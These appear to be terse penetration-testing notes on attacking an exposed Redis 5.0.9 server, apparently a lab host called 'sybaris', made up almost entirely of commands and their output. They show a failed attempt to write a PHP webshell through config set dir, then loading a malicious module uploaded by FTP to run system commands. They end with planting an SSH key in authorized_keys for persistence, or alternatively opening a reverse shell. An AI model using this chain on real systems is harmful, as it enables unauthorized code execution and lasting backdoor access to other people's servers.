4 :6379 redis

redis-cli -h 192.168.224.93

192.168.224.93:6379> info server
# Server
redis_version:5.0.9

os:Linux 3.10.0-1127.19.1.el7.x86_64 x86_64
arch_bits:64
gcc_version:4.8.5

executable:/usr/local/bin/redis-server
config_file:/etc/redis/redis.conf

Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#webshell

# we can set config dir to /var/www/html
but we cannot write there.
192.168.224.93:6379> config set dir /var/www/html/
OK
192.168.224.93:6379> config set dbfilename redis.php
OK
192.168.224.93:6379> set test "<?php phpinfo(); ?>"
OK
192.168.224.93:6379> save
(error) ERR

Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module
# clone repo, make
# need to upload the module.so
# we can use ftp to upload 

Uploaded module.so on ftp pub/

Default path is /var/ftp

Using redis-cli

192.168.224.93:6379> module load /var/ftp/pub/module.so
192.168.224.93:6379> modue list
(error) ERR unknown command `modue`, with args beginning with: `list`,
192.168.224.93:6379> module list
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
   
192.168.224.93:6379> system.exec "whoami;id;hostname;uname -a"
"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
192.168.224.93:6379>

192.168.224.93:6379> system.exec "mkdir /home/pablo/.ssh"
192.168.224.93:6379> system.exec 'echo "ssh-rsa <<id_rsa.pub>> > /home/pablo/.ssh/authorized_keys'

[OR]
192.168.224.93:6379> system.rev IP PORT